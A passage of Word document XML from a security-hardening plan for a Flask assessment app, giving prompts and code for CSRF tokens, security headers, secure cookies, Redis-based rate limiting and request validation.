    <w:p w14:paraId="53124D22" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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brute force protection on login and assessment submission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025F349" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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session consistency checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2FA81" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Integrate with existing authentication decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66810F8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3DFFD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Prompt S3: CSRF Protection and Security Headers (CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658CCBB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**Dependencies:** Prompts S1-S2 completed  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6570524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**Estimated Time:** 45-60 minutes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2111160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**Files Created:** `backend/security/csrf_protection.py`, `backend/security/security_headers.py`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2786F92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109174" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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CSRF protection and security headers for all assessment endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A8CB89" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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CSRF Token System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649509A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import secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A1479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hmac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A43A13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hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F8D0B3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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F3C1B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flask import session, request,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jsonify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="125ADAE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functools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import wraps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428B9DF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137D75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CSRFProtection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564DBAF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__(self,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secret_key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str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A67B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self.secret_key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secret_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D393EC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self.token_lifetime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3600  # 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28294E5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53AF9D2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generate_csrf_token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str = None) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D8FF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not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55F85DD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secrets.token_urlsafe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(32))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343568B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FFED2E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timestamp = str(int(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()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEDB80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token_data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f"{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}:{timestamp}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B9520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signature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hmac.new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</w:p>
    <w:p w14:paraId="078D025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self.secret_key.encode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(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A023C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token_data.encode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(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589E83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hashlib.sha256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769DFB5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).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hexdigest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25C01A6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55C1237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f"{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token_data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}:{signature}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D79EAA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792C473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validate_csrf_token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token: str,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str = None) -&gt; bool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B4B92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not token:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A302BF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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512926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3487F2D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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C892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parts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token.split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(':')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7B0C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(parts) != 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E36BBC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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CEC58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1B7D2FD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token_session_id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timestamp, signature = parts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA092B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2728260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# Check session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47CE4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current_session_id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or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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2788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token_session_id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!=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current_session_id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2296A5F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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086AB7A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0115166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# Check timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2108595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token_time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int(timestamp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5858FB4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() -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token_time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&gt;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self.token_lifetime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68ABFA5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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AFB83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783B034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# Verify signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA7B5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token_data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f"{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token_session_id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}:{timestamp}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465A6E7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expected_signature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hmac.new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</w:p>
    <w:p w14:paraId="164D2F2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self.secret_key.encode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(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1726D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token_data.encode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(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553AC67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hashlib.sha256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADDEAA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).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hexdigest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3E7FCD7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47F9AB3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hmac.compare_digest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(signature,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expected_signature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502B23A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22042F2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except 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ValueError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TypeError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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1592222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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234AEA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A1CDB8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CSRF decorator for assessment endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201F10A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require_csrf_token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(f):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CFAAF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@wraps(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DFAC9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decorated_function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(*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args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**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kwargs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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBE56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csrf_protection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CSRFProtection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current_app.config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['SECRET_KEY'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD93F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03B3216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token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request.headers.get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('X-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CSRFToken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') or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request.form.get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csrf_token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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A14899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not token:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF294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log_security_event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("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csrf_token_missing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", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020FE80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 'anonymous'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37444C5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{"endpoint":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request.endpoint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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5230DD7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jsonify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({"error": "CSRF token required"}), 403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC78B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E9EF81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not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csrf_protection.validate_csrf_token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(token):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F6EE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log_security_event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("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csrf_token_invalid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", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D8B5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session.get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 'anonymous'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6386C3F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{"endpoint":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request.endpoint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"token": token[:10] + "..."})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4418F29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jsonify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({"error": "Invalid CSRF token"}), 403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C202BA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49369AF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f(*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args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**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kwargs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4EE43A5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decorated_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="249F0D6C" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Security Headers Middleware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D2BEB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from flask import Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EACA6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16357B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SecurityHeaders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5B28C4D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__(self, app=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4614899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app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEFDD4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app is not None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3908715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self.init_app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(app)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F1D9B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4039647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init_app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(self, app):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D1260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app.after_request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self.add_security_headers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16AC450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69E1658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add_security_headers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(self, response: Response) -&gt; Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0700BE2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Prevent MIME type sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C2E1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['X-Content-Type-Options'] =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nosniff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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D12A9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15B642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Prevent clickjacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D233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['X-Frame-Options'] = 'DENY'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADC33D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5CBEAB6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XSS protection (deprecated but still used by some browsers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C293D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['X-XSS-Protection'] = '1; mode=block'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF726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5DC3DF0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Force HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E512AE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['Strict-Transport-Security'] = 'max-age=31536000;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includeSubDomains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; preload'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE79B5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323F0DA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Content Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FBB09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csp_policy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(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB23A1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</w:t>
      </w:r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default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src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'self'; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A744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</w:t>
      </w:r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script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src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'self' 'unsafe-inline' https://www.googletagmanager.com https://www.google-analytics.com; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FB499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</w:t>
      </w:r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style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src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'self' 'unsafe-inline' https://fonts.googleapis.com; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A430D7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</w:t>
      </w:r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font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src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'self' https://fonts.gstatic.com; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6969098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img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-src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'self' data: </w:t>
      </w:r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https:;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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9FD58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</w:t>
      </w:r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connect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src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'self' https://www.google-analytics.com; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CEEF6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</w:t>
      </w:r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frame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-ancestors 'none'; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C278E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</w:t>
      </w:r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base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uri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'self'; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A57BA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</w:t>
      </w:r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form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-action 'self'; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62859CE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</w:t>
      </w:r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upgrade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-insecure-requests"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1C8C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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DF3E6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['Content-Security-Policy']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csp_policy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4968AD6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4FD25CE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Referrer policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5442279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['Referrer-Policy'] = 'strict-origin-when-cross-origin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F67FE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394F6B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Permissions policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA913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permissions_policy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(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32D69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"geolocation=(), "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FE56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"microphone=(), "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F08C3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"camera=(), "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F40E8B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"payment=(), "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B6A5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usb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=(), "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549AC97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"magnetometer=(), "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512EE55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"gyroscope=(), "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F212D0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"speaker=()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C900A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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B708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['Permissions-Policy']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permissions_policy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6588745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3EE3CEC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Remove server information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448153D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response.headers.pop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('Server', None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307ADA0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40B978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response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC13DCE" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Secure Cookie Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CFC5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configure_secure_cookies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(app):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5319CD8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app.config.update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</w:p>
    <w:p w14:paraId="1FEF97A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SESSION_COOKIE_SECURE=True,  # HTTPS only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4599BE0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SESSION_COOKIE_HTTPONLY=True,  # No JavaScript access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361CF78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SESSION_COOKIE_SAMESITE='Strict',  # CSRF protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104FD03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PERMANENT_SESSION_LIFETIME=3600,  # 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F41C0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SESSION_COOKIE_NAME='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mingus_session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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE44C6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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4452E72D" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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Integration Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B7D31" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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CSRF protection to all assessment submission endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7EA475" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Apply security headers to all responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477E650" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Configure secure cookie settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CB3B51" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Integrate with existing Flask application factory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAF6B5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6BFE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Prompt S4: Rate Limiting and API Security (HIGH PRIORITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EDCB9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**Dependencies:** Prompts S1-S3 completed  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA7B67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**Estimated Time:** 60-75 minutes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10F5C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**Files Created:** `backend/security/rate_limiter.py`, `backend/security/api_validator.py`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B1FD1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46D908" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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comprehensive rate limiting and API security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D00EFE8" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Advanced Rate Limiting System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0800759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redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14ACFC2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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B5312A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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFF755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flask import request,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jsonify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g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F469C2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functools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import wraps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1211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typing 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Any, Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF4DB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3144D1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AdvancedRateLimiter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7CDDC09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__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623185B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self.redis_client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redis.Redis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(host='localhost', port=6379,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db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=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4A8A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self.default_limits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7F271EA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_submit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{'requests': 3, 'window': 300},  # 3 per 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0D76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_view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{'requests': 20, 'window': 300},   # 20 per 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E423F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_general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{'requests': 100, 'window': 3600}      # 100 per hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344B89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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6B188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2D97F2E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get_identifier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(self, request) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394EE3F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Use user ID if authenticated, otherwise IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228D006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g.get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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16546E2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401334C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f"user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}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD536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f"ip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request.remote_addr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}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D5290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7092C0A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is_rate_limited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identifier: str,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endpoint_type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str) -&gt;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[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F50CA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limits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self.default_limits.get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endpoint_type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self.default_limits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api_general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'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF40C3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key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f"rate_limit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endpoint_type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}:{identifier}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C85326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CEBA20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Get current usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B32BF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current_usage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self.redis_client.get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(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A9E19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current_usage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5A414A3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usage_data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json.loads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current_usage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15C99F7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requests_made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usage_data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requests'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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F8410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window_start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usage_data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window_start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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E3490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0274DD0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# Check if we're still in the same window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584FD5F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() -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window_start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&lt; limits['window']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D14E9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requests_made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&gt;= limits['requests']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBFBA4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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F596EE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'limited': True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2500C0E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requests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_made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requests_made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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F62DA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'limit': limits['requests'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0742F6B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window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_remaining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limits['window'] - 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() -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window_start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2EFF1B5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC91BD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</w:p>
    <w:p w14:paraId="3D3EFB2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# Increment counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3434CE8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usage_data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['requests'] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E4951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self.redis_client.setex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(key, limits['window'],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json.dumps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usage_data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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24398BF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</w:p>
    <w:p w14:paraId="4EBA99E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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF2EB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'limited': False,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F659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requests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_made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usage_data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['requests'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C082BA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'limit': limits['requests'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107FF73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window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_remaining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limits['window'] - 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() -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window_start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183CE15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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729C811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911570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First request in new window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294565C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usage_data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665DD42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'requests': 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A11F6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window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_start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183FA67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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE0EA9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self.redis_client.setex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(key, limits['window'],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json.dumps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usage_data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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9526E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403648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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133A63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'limited': False,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C87C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requests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_made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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7571206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'limit': limits['requests'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF3E93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window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_remaining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limits['window']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4734B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BDC70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2C89A8D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log_rate_limit_violation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identifier: str,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endpoint_type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str,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limit_info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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381E402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log_security_event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("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rate_limit_exceeded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", identifier, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F028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endpoint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endpoint_type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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386125B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requests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_made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limit_info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requests_made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'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F1100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"limit":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limit_info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['limit'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800FD5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"endpoint":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request.endpoint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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903C4C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_agent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request.headers.get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('User-Agent')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A1E74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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3283E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2FB317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Rate limiting decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A4DE6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rate_limited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endpoint_type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str,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custom_limits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Optional[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] = None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F5A06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decorator(f):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E16D6E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@wraps(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3FF73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decorated_function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(*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args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**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kwargs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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FC173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rate_limiter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AdvancedRateLimiter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5713FDE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34FFC40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# Override default limits if provided</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530F52B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custom_limits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0DE46BE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rate_limiter.default_limits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endpoint_type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]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custom_limits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F0D473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0B71632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identifier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rate_limiter.get_identifier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(request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5405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limit_info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rate_limiter.is_rate_limited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(identifier,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endpoint_type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36B1D81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5FBAE03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limit_info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['limited']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F376D6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rate_limiter.log_rate_limit_violation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(identifier,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endpoint_type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limit_info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2C6BD0D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</w:p>
    <w:p w14:paraId="3F37C78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response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jsonify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({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF91A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"error": "Rate limit exceeded",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B402F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"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retry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_after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": int(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limit_info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window_remaining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'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3BB1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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E368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response.status_code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429</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCDCD1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['Retry-After'] = str(int(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limit_info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window_remaining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']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141466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['X-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RateLimit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-Limit'] = str(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limit_info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['limit'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20373BA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['X-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RateLimit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-Remaining'] = '0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F86C2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['X-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RateLimit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-Reset'] = str(int(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() +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limit_info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window_remaining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']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32590E7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</w:p>
    <w:p w14:paraId="1D8DF62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response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A1D9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6CBE5D1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# Add rate limit headers to successful responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05DB0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g.rate_limit_info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limit_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21B1554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f(*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args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**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kwargs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2B20FFD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decorated_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C04021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return decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D2346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B30544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Add rate limit headers to response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D852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add_rate_limit_headers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(response):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8AEC5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hasattr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(g,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rate_limit_info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'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9962A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info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g.rate_limit_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A6B72F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['X-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RateLimit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-Limit'] = str(info['limit'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726720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['X-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RateLimit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-Remaining'] = str(info['limit'] - info['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requests_made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'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F2546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['X-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RateLimit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-Reset'] = str(int(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 + info['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window_remaining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']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039C108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return response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1532546C" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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API Request Validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD7D1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flask import request,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jsonify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A159F1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typing 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Any, List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A863D1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AE219C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APIValidator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0F03EE9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__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E5D88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self.max_request_size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1024 * 1024  # 1MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B05E3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self.allowed_content_types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['application/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 'application/x-www-form-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urlencoded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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291ABC5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self.required_headers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['User-Agent', 'Accept']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B8527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173F5DB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validate_request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(self) -&gt;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[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FA225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request size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B039E8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request.content_length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and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request.content_length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&gt;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self.max_request_size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14E5428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{"valid": False, "reason": "Request too large", "code": 413}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A36630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5381D48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content type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3998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request.content_type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not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self.allowed_content_types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08E5E9B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{"valid": False, "reason": "Unsupported content type", "code": 415}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7744269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0C89342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required headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A309D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for header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self.required_headers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37BD947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not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request.headers.get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(header):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF5496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{"valid": False, "reason":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f"Missing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required header: {header}", "code": 400}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E131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E0034F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for suspicious patterns in headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FC19F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header_name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header_value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1A7C912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self._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contains_suspicious_patterns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header_value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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D9C4D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{"valid": False, "reason": "Suspicious header content", "code": 400}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386111A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EEEC0D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{"valid": True}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28696A3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6F1BFBD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contains_suspicious_patterns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(self, value: str) -&gt; bool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9A6F9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suspicious_patterns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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B76B6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r"&lt;script",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519FA10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r"javascript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:",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0C71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r"data:text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/html",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77125D0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r"vbscript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:",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16888F4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r"onload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=",</w:t>
